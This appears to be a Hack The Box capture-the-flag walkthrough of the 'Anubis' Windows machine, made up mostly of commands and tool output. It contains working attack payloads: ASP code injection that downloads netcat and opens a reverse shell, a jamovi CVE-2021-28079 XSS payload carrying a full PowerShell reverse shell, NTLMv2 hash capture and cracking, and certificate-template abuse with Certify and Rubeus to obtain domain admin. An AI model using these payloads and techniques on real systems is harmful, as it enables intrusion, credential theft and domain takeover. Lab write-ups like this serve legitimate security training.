Hackthebox Anubis walkthrough
Summary
- RCE in the Web application
- Pivoting
- Network analysis
- Custom Exploitation
- Domain Admin by Abusing Certifcate service
Scanning
┌─[puck@parrot-lt]─[~/htb/anubis] └──╼ $nmap -Pn -sC -sV 10.10.11.102 -oN allports.nmap Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-23 08:23 CET Nmap scan report for www.windcorp.htb (10.10.11.102) Host is up (0.28s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_ssl-date: 2022-02-23T08:40:00+00:00; +1h14m55s from scanner time. | tls-alpn: |_ http/1.1 |_http-title: Windcorp – Index | http-methods: |_ Potentially risky methods: TRACE | ssl-cert: Subject: commonName=www.windcorp.htb | Subject Alternative Name: DNS:www.windcorp.htb | Not valid before: 2021-05-24T19:44:56 |_Not valid after: 2031-05-24T19:54:56 | http-server-header: | Microsoft-HTTPAPI/2.0 |_ Microsoft-IIS/10.0 445/tcp open microsoft-ds? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results: | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-02-23T08:39:24 |_ start_date: N/A |_clock-skew: mean: 1h14m56s, deviation: 2s, median: 1h14m54sService detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 106.27 seconds ┌─[puck@parrot-lt]─[~/htb/anubis] |
Lets add windorp.htb to /etc/hosts and check the web application.
┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $echo "10.10.11.102 www.windcorp.htb" | sudo tee --append /etc/hosts
10.10.11.102 www.windcorp.htb
The application is static, there is only from that looks interesting.
I will use burpsuite to analyze the request.
GET /save.asp?name=puck&email=puck%40home.nl&subject=hoi&message=hoihoi HTTP/1.1 Host: www.windcorp.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Dnt: 1 Referer: https://www.windcorp.htb/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close
User input goes to save.asp file, Can we get a remote code execution ?.
Lets check !
I injected the message parameter with .net code to ping me, Now i will start tcpdump to listen to ICMP.
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
|
BINGO !
other way is to use
<%
Set shell = CreateObject("WScript.Shell")
Set proc = shell.exec("whoami")
Response.Write(proc.StdOut.ReadAll)
%>
This gives as result in burp
<b>Subject: </b></td><td>areyouthere</td></tr><tr><td> <b>Message: </b></td><td>nt authority\system </td>
The code worked and i received the ICMP requests.
└─$ sudo tcpdump -i tun0 icmp
[sudo] password for kali:
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
11:08:02.641660 IP www.windcorp.htb > 10.10.14.2: ICMP echo request, id 1000, seq 2765, length 40
11:08:02.641680 IP 10.10.14.2 > www.windcorp.htb: ICMP echo reply, id 1000, seq 2765, length 40
|
Foothold
We could use generating the reverse shell using revshells
i used below PAYLOAD
<%
Set shell = CreateObject("WScript.Shell")
Set proc = shell.exec("powershell -c curl -outfile C:\nc64.exe http://10.10.14.2/nc64.exe; C:\nc64.exe -e powershell 10.10.14.2 443")
Response.Write(proc.StdOut.ReadAll)
%>
|
I need now to listen on port 443 using netcat., and get my reverse shell.
┌─[✗]─[puck@parrot-lt]─[~/htb/anubis] └──╼ $sudo nc -nlvp 443 listening on [any] 443 … connect to [10.10.14.2] from (UNKNOWN) [10.10.11.102] 49920 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.PS C:\windows\system32\inetsrv> whoami whoami nt authority\systemPS C:\windows\system32\inetsrv> hostname hostname webserver01 PS C:\windows\system32\inetsrv> ipconfig ipconfigWindows IP Configuration Ethernet adapter vEthernet (Ethernet): Connection-specific DNS Suffix . : htb |
Hmm?, system ! I don’t think it’s easy like that
PS C:\Users> ls Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 4/9/2021 10:36 PM Administrator d----- 5/25/2021 12:05 PM ContainerAdministrator d----- 4/9/2021 10:37 PM ContainerUser d-r--- 4/9/2021 10:36 PM Public |
It’s a container.
Enumeration
Lets see what the Administrator have on desktop.
PS C:\Users\Administrator\Desktop> ls Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 5/24/2021 9:36 PM 989 req.txt PS C:\Users\Administrator\Desktop> type req.txt -----BEGIN CERTIFICATE REQUEST----- MIICoDCCAYgCAQAwWzELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx ETAPBgNVBAoMCFdpbmRDb3JwMSQwIgYDVQQDDBtzb2Z0d2FyZXBvcnRhbC53aW5k Y29ycC5odGIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCmm0r/hZHC KsK/BD7OFdL2I9vF8oIeahMS9Lb9sTJEFCTHGxCdhRX+xtisRBvAAFEOuPUUBWKb BEHIH2bhGEfCenhILl/9RRCuAKL0iuj2nQKrHQ1DzDEVuIkZnTakj3A+AhvTPntL eEgNf5l33cbOcHIFm3C92/cf2IvjHhaJWb+4a/6PgTlcxBMne5OsR+4hc4YIhLnz QMoVUqy7wI3VZ2tjSh6SiiPU4+Vg/nvx//YNyEas3mjA/DSZiczsqDvCNM24YZOq qmVIxlmQCAK4Wso7HMwhaKlue3cu3PpFOv+IJ9alsNWt8xdTtVEipCZwWRPFvGFu 1x55Svs41Kd3AgMBAAGgADANBgkqhkiG9w0BAQsFAAOCAQEAa6x1wRGXcDBiTA+H JzMHljabY5FyyToLUDAJI17zJLxGgVFUeVxdYe0br9L91is7muhQ8S9s2Ky1iy2P WW5jit7McPZ68NrmbYwlvNWsF7pcZ7LYVG24V57sIdF/MzoR3DpqO5T/Dm9gNyOt yKQnmhMIo41l1f2cfFfcqMjpXcwaHix7bClxVobWoll5v2+4XwTPaaNFhtby8A1F F09NDSp8Z8JMyVGRx2FvGrJ39vIrjlMMKFj6M3GAmdvH+IO/D5B6JCEE3amuxU04 CIHwCI5C04T2KaCN4U6112PDIS0tOuZBj8gdYIsgBYsFDeDtp23g4JsR6SosEiso 4TlwpQ== -----END CERTIFICATE REQUEST----- |
It’s SSL certifacte, lets decode it.
┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $openssl req -in req.txt -noout -text
Certificate Request:
Data:
Version: 1 (0x0)
Subject: C = AU, ST = Some-State, O = WindCorp, CN = softwareportal.windcorp.htb
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a6:9b:4a:ff:85:91:c2:2a:c2:bf:04:3e:ce:15:
d2:f6:23:db:c5:f2:82:1e:6a:13:12:f4:b6:fd:b1:
32:44:14:24:c7:1b:10:9d:85:15:fe:c6:d8:ac:44:
1b:c0:00:51:0e:b8:f5:14:05:62:9b:04:41:c8:1f:
66:e1:18:47:c2:7a:78:48:2e:5f:fd:45:10:ae:00:
a2:f4:8a:e8:f6:9d:02:ab:1d:0d:43:cc:31:15:b8:
89:19:9d:36:a4:8f:70:3e:02:1b:d3:3e:7b:4b:78:
48:0d:7f:99:77:dd:c6:ce:70:72:05:9b:70:bd:db:
f7:1f:d8:8b:e3:1e:16:89:59:bf:b8:6b:fe:8f:81:
39:5c:c4:13:27:7b:93:ac:47:ee:21:73:86:08:84:
b9:f3:40:ca:15:52:ac:bb:c0:8d:d5:67:6b:63:4a:
1e:92:8a:23:d4:e3:e5:60:fe:7b:f1:ff:f6:0d:c8:
46:ac:de:68:c0:fc:34:99:89:cc:ec:a8:3b:c2:34:
cd:b8:61:93:aa:aa:65:48:c6:59:90:08:02:b8:5a:
ca:3b:1c:cc:21:68:a9:6e:7b:77:2e:dc:fa:45:3a:
ff:88:27:d6:a5:b0:d5:ad:f3:17:53:b5:51:22:a4:
26:70:59:13:c5:bc:61:6e:d7:1e:79:4a:fb:38:d4:
a7:77
Exponent: 65537 (0x10001)
Attributes:
a0:00
Signature Algorithm: sha256WithRSAEncryption
6b:ac:75:c1:11:97:70:30:62:4c:0f:87:27:33:07:96:36:9b:
63:91:72:c9:3a:0b:50:30:09:23:5e:f3:24:bc:46:81:51:54:
79:5c:5d:61:ed:1b:af:d2:fd:d6:2b:3b:9a:e8:50:f1:2f:6c:
d8:ac:b5:8b:2d:8f:59:6e:63:8a:de:cc:70:f6:7a:f0:da:e6:
6d:8c:25:bc:d5:ac:17:ba:5c:67:b2:d8:54:6d:b8:57:9e:ec:
21:d1:7f:33:3a:11:dc:3a:6a:3b:94:ff:0e:6f:60:37:23:ad:
c8:a4:27:9a:13:08:a3:8d:65:d5:fd:9c:7c:57:dc:a8:c8:e9:
5d:cc:1a:1e:2c:7b:6c:29:71:56:86:d6:a2:59:79:bf:6f:b8:
5f:04:cf:69:a3:45:86:d6:f2:f0:0d:45:17:4f:4d:0d:2a:7c:
67:c2:4c:c9:51:91:c7:61:6f:1a:b2:77:f6:f2:2b:8e:53:0c:
28:58:fa:33:71:80:99:db:c7:f8:83:bf:0f:90:7a:24:21:04:
dd:a9:ae:c5:4d:38:08:81:f0:08:8e:42:d3:84:f6:29:a0:8d:
e1:4e:b5:d7:63:c3:21:2d:2d:3a:e6:41:8f:c8:1d:60:8b:20:
05:8b:05:0d:e0:ed:a7:6d:e0:e0:9b:11:e9:2a:2c:12:2b:28:
e1:39:70:a5
┌─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $
|
There is another subdomain, I added it to /etc/hosts but i couldn’t reach it
I need to establish a tunnel to port forward the machines ports to see be able to open the internal web application.
Port forwarding
If you are struggling downloading chisel to the machine you can use this command :
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/chisel.exe','C:\users\Administrator\Desktop\chisel.exe')
Victim Machine
PS C:\users\administrator\desktop> .\chisel.exe
.\chisel.exe client 10.10.14.2:1337 R:127.0.0.1:socks
2022/02/25 14:22:46 client: Connecting to ws://10.10.14.2:1337
2022/02/25 14:22:48 client: Connected (Latency 147.5104ms)
|
Attacker Machine
┌─[✗]─[puck@parrot-lt]─[~/htb/anubis] └──╼ $./chisel server -p 1337 –reverse 2022/02/25 13:08:06 server: Reverse tunnelling enabled 2022/02/25 13:08:06 server: Fingerprint 2xJ5k3GohfxUHC9nrh2ELWq1sXfkn2yhUtQ2/eVwqqs= 2022/02/25 13:08:06 server: Listening on http://0.0.0.0:1337 2022/02/25 13:08:32 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening |
.
┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $sudo proxychains crackmapexec smb 172.18.208.1
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:135-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.18.208.1:445-<><>-OK
SMB 172.18.208.1 445 EARTH [*] Windows 10.0 Build 17763 x64 (name:EARTH) (domain:windcorp.htb) (signing:True) (SMBv1:False)
┌─[puck@parrot-lt]─[~/htb/anubis]
Now we need too add softwareportal.windcorp.htb to our /etc/hosts and setup the socks as our proxy in the browser.
172.18.208.1 softwareportal.windcorp.htb that's the container default gateway |
The web application is getting the programs from internal ip, lets see what is happening.
Lateral Movement
Lets analyze the request by changing the client to our ip and setup a listener using TCPDUMP to see what is happening.
Victim Machine
PS C:\windows\system32\inetsrv> curl "http://softwareportal.windcorp.htb/install.asp?client=10.10.14.2&software=gimp-2.10.24-setup-3.exe"
|
Attacker Machine
└─$ sudo tcpdump -i tun0 -w logs.pcap -n tcpdump: listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes |
Lets grep the logs and start the analysis.
tcpdump -r logs.pcap | grep -v '5554' | head reading from file logs.pcap, link-type RAW (Raw IP), snapshot length 262144 20:47:56.626363 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [SEW], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:56.626424 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 4024374085, win 0, length 0 20:47:57.373410 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [S], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:57.373457 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 1, win 0, length 0 20:47:58.089647 IP 10.10.11.102.50856 > 10.10.17.76.5985: Flags [S], seq 4024374084, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:58.089682 IP 10.10.17.76.5985 > 10.10.11.102.50856: Flags [R.], seq 0, ack 1, win 0, length 0 20:47:58.249260 IP 10.10.11.102.50857 > 10.10.17.76.5985: Flags [SEW], seq 2900609790, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:58.249305 IP 10.10.14.79.5985 > 10.10.11.102.50857: Flags [R.], seq 0, ack 2900609791, win 0, length 0 20:47:59.012439 IP 10.10.11.102.50857 > 10.10.17.76.5985: Flags [S], seq 2900609790, win 64240, options [mss 1357,nop,wscale 8,nop,nop,sackOK], length 0 20:47:59.012486 IP 10.10.17.76.5985 > 10.10.11.102.50857: Flags [R.], seq 0, ack 1, win 0, length 0 |
That didn’t work for me from the 1st time, don’t give up on it, keep trying.
From that logs i understood that the web application trying to authenticate from WinRM to get the file.
Escaping the docker
I will start the responder to catch the hash of the user that trying to authenticate against WinRM.
sudo responder -I tun0 -v |
Lets repeat the request and see what will happen.
PS C:\windows\system32\inetsrv> curl "http://softwareportal.windcorp.htb/install.asp?client=10.10.14.2&software=gimp-2.10.24-setup-3.exe"
|
BAM !
[+] Listening for events... [WinRM] NTLMv2 Client : 10.10.11.102 [WinRM] NTLMv2 Username : windcorp\localadmin [WinRM] NTLMv2 Hash : localadmin::windcorp:5154b10fe742e26f:02D37AB30D2443EEFC13F18062985D6E:0101000000000000B574CFFAD2CDD7012A9D75CCC99D4C0D0000000002000800490053003700540001001E00570049004E002D00520031005800530059005400560035003700450034000400140049005300370054002E004C004F00430041004C0003003400570049004E002D00520031005800530059005400560035003700450034002E0049005300370054002E004C004F00430041004C000500140049005300370054002E004C004F00430041004C0008003000300000000000000000000000002100008840E4FBD0AA6E1880E61526E42DF0210E6BE2F694B85FED945A976C305BDE030A001000000000000000000000000000000000000900200048005400540050002F00310030002E00310030002E00310034002E00370039000000000000000000 |
Lets crack it.
hashcat -m 5600 hash_localadmin /usr/share/wordlists/rockyou.txt hashcat (v6.1.1) starting... ------------SNIP------------ LOCALADMIN::windcorp:5154b10fe742e26f:02d37ab30d2443eefc13f18062985d6e:0101000000000000b574cffad2cdd7012a9d75ccc99d4c0d0000000002000800490053003700540001001e00570049004e002d00520031005800530059005400560035003700450034000400140049005300370054002e004c004f00430041004c0003003400570049004e002d00520031005800530059005400560035003700450034002e0049005300370054002e004c004f00430041004c000500140049005300370054002e004c004f00430041004c0008003000300000000000000000000000002100008840e4fbd0aa6e1880e61526e42df0210e6be2f694b85fed945a976c305bde030a001000000000000000000000000000000000000900200048005400540050002f00310030002e00310030002e00310034002e00370039000000000000000000:Secret123 Session..........: hashcat Status...........: Cracked Hash.Name........: NetNTLMv2 Hash.Target......: LOCALADMIN::windcorp:5154b10fe742e26f:02d37ab30d244...000000 Time.Started.....: Sat Oct 30 21:17:32 2021 (3 secs) Time.Estimated...: Sat Oct 30 21:17:35 2021 (0 secs) Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 713.3 kH/s (2.36ms) @ Accel:1024 Loops:1 Thr:1 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 2093056/14344385 (14.59%) Rejected.........: 0/2093056 (0.00%) Restore.Point....: 2091008/14344385 (14.58%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: Smudge4 -> SaTeLlItE Started: Sat Oct 30 21:17:30 2021 Stopped: Sat Oct 30 21:17:37 2021 ------------SNIP------------ |
User
Lets enumerate SMB.
smbclient -L //10.10.11.102 -U localadmin
Enter WORKGROUP\localadmin's password:Secret123
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
CertEnroll Disk Active Directory Certificate Services share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shared Disk
SYSVOL Disk Logon server share
|
> smbclient //10.10.11.102/Shared -U localadmin
Enter WORKGROUP\localadmin's password:Secret123
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 28 15:06:06 2021
.. D 0 Wed Apr 28 15:06:06 2021
Documents D 0 Tue Apr 27 04:09:25 2021
Software D 0 Thu Jul 22 18:14:16 2021
9034239 blocks of size 4096. 3206077 blocks available
smb: \> ls Software\
. D 0 Thu Jul 22 18:14:16 2021
.. D 0 Thu Jul 22 18:14:16 2021
7z1900-x64.exe N 1447178 Mon Apr 26 21:10:08 2021
jamovi-1.6.16.0-win64.exe N 247215343 Mon Apr 26 21:03:30 2021
VNC-Viewer-6.20.529-Windows.exe N 10559784 Mon Apr 26 21:09:53 2021
9034239 blocks of size 4096. 3206077 blocks available
|
smb: \> ls Documents\Analytics\ . D 0 Tue Apr 27 18:40:20 2021 .. D 0 Tue Apr 27 18:40:20 2021 Big 5.omv A 6455 Tue Apr 27 18:39:20 2021 Bugs.omv A 2897 Tue Apr 27 18:39:55 2021 Tooth Growth.omv A 2142 Tue Apr 27 18:40:20 2021 Whatif.omv A 2841 Sat Oct 30 21:49:42 2021 9034239 blocks of size 4096. 3206077 blocks available |
What is .omv, Lets search.
I searched for jamovi latest vulnerabilities and i found this CVE-2021-28079
I need to make .OMV file and inject XSS payload to get a reverse shell.
note : Don’t exhaust yourself trying to find that vuln version download it from the share.
Lets unzip Whatif.omv.
└─# unzip Whatif.omv Archive: Whatif.omv inflating: META-INF/MANIFEST.MF inflating: index.html inflating: metadata.json inflating: xdata.json inflating: data.bin inflating: 01 empty/analysis |
I injected the name column as described in the previous link.
(() => { let sh = require('child_process'); sh.exec("powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.17.76',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\""); return /a/; })(); |
That is the reverse shell i used make sure you save it as .js file, Now replace the file we made with the one on the server using SMB.
┌─[puck@parrot-lt]─[~/htb/anubis/omv]
└──╼ $smbclient //10.10.11.102/Shared -U windcorp.htb/localadmin Secret123
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Apr 28 17:06:06 2021
.. D 0 Wed Apr 28 17:06:06 2021
Documents D 0 Tue Apr 27 06:09:25 2021
Software D 0 Thu Jul 22 20:14:16 2021
9034239 blocks of size 4096. 3242014 blocks available
smb: \> cd Documents
smb: \Documents\> ls
. D 0 Tue Apr 27 06:09:25 2021
.. D 0 Tue Apr 27 06:09:25 2021
Analytics D 0 Tue Apr 27 20:40:20 2021
9034239 blocks of size 4096. 3242014 blocks available
smb: \Documents\> cd Analytics
smb: \Documents\Analytics\> ls
. D 0 Tue Apr 27 20:40:20 2021
.. D 0 Tue Apr 27 20:40:20 2021
Big 5.omv A 6455 Tue Apr 27 20:39:20 2021
Bugs.omv A 2897 Tue Apr 27 20:39:55 2021
Tooth Growth.omv A 2142 Tue Apr 27 20:40:20 2021
Whatif.omv A 2841 Thu Feb 24 13:00:07 2022
9034239 blocks of size 4096. 3242014 blocks available
smb: \Documents\Analytics\> put Whatif.omv
putting file Whatif.omv as \Documents\Analytics\Whatif.omv (11.1 kb/s) (average 11.1 kb/s)
smb: \Documents\Analytics\>
smb: \Documents\Analytics\> smb: \Documents\Analytics\> put Whatif.omv putting file Whatif.omv as \Documents\Analytics\Whatif.omv (2.0 kb/s) (average 2.0 kb/s) |
start you Http server to deliver the file and use netcat to get the reverseshell.
PS C:\users\diegocruz> cd Desktop PS C:\users\diegocruz\Desktop> type user.txt 8a298cdf7dc52a52a607b9f3912966ff |
ROOT
If you noticed CertEnroll share when we used SMBclient, that folder used by Active Directory Certificate Services for certificate enrollment.
now lets use certutil -template to see what template we have permission to issue.
PS> certutil -template
Template[31]:
TemplatePropCommonName = Web
TemplatePropFriendlyName = Web
TemplatePropSecurityDescriptor = O:LAG:S-1-5-21-3510634497-171945951-3071966075-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3510634497-171945951-3071966075-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3510634497-171945951-3071966075-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;LA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3510634497-171945951-3071966075-3290)(A;;LCRPLORC;;;AU)
Allow Enroll WINDCORP\Domain Admins
Allow Enroll WINDCORP\Enterprise Admins
Allow Full Control WINDCORP\Domain Admins
Allow Full Control WINDCORP\Enterprise Admins
Allow Full Control WINDCORP\Administrator
Allow Full Control WINDCORP\webdevelopers
Allow Read NT AUTHORITY\Authenticated Users
|
USER INFORMATION ---------------- User Name SID ================== ============================================= windcorp\diegocruz S-1-5-21-3510634497-171945951-3071966075-3245 GROUP INFORMATION ----------------- Group Name Type SID Attributes ========================================== ================ ============================================= ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Group used for deny only NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group WINDCORP\webdevelopers Group S-1-5-21-3510634497-171945951-3071966075-3290 Mandatory group, Enabled by default, Enabled group |
The user we have is a member of webdevelopers group, So we can issue the certificate using WEB template.
After some searching i found a detailed article for this attack Certified-Pre-Owned
We need to get Certify.exe to start out attack, You can find it here CompiledBinaires
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/certify.exe','C:\users\diegocruz\Desktop\certify.exe')
PS C:\Users\diegocruz\Desktop> (new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/rubeus.exe','C:\users\diegocruz\Desktop\rubeus.exe')
(new-object System.Net.WebClient).DownloadFile('http://10.10.14.2/rubeus.exe','C:\users\diegocruz\Desktop\rubeus.exe')
PS C:\Users\diegocruz\Desktop>
PS C:\Users\diegocruz\Desktop> .\certify.exe request /ca:earth.windcorp.htb\windcorp-CA /template:Web /altname:Administrator
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.0.0
[*] Action: Request a Certificates
[*] Current user context : WINDCORP\diegocruz
[*] No subject name specified, using current context as subject.
[*] Template : Web
[*] Subject : CN=Diego Cruz, OU=MainOffice, DC=windcorp, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : earth.windcorp.htb\windcorp-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 3
[*] cert.pem :
|
Now copy the certificate from the victim machine and paste it to a file called cert.pem in your machine, Now convert it using openssl.
└─# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
┌──(root💀kali)-[/home/kali/HTB/anubis]
└─# ls
cert.pem cert.pfx
|
Lets get our TGT.
.\rubeus.exe asktgt /user:Administrator /certificate:C:\users\diegocruz\desktop\cert.pfx
Export it to KRB :
DONE
┌─[✗]─[puck@parrot-lt]─[~/htb/anubis]
└──╼ $python3 psexec.py -hashes 3CCC18280610C6CA3156F995B5899E09:3CCC18280610C6CA3156F995B5899E09 administrator@10.10.11.102 cmd.exe
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Requesting shares on 10.10.11.102.....
[*] Found writable share ADMIN$
[*] Uploading file cmOtbeVS.exe
[*] Opening SVCManager on 10.10.11.102.....
[*] Creating service zMsf on 10.10.11.102.....
[*] Starting service zMsf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd c:\users\administrator\desktop
c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 77EB-C165
Directory of c:\Users\Administrator\Desktop
08/11/2021 12:54 PM <DIR> .
08/11/2021 12:54 PM <DIR> ..
02/24/2022 11:53 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 13,199,126,528 bytes free
c:\Users\Administrator\Desktop>type root.txt
38e[redacted]de3f
c:\Users\Administrator\Desktop>
references used :
Impersonating a Windows Enterprise Admin with a Certificate: Kerberos PKINIT from Linux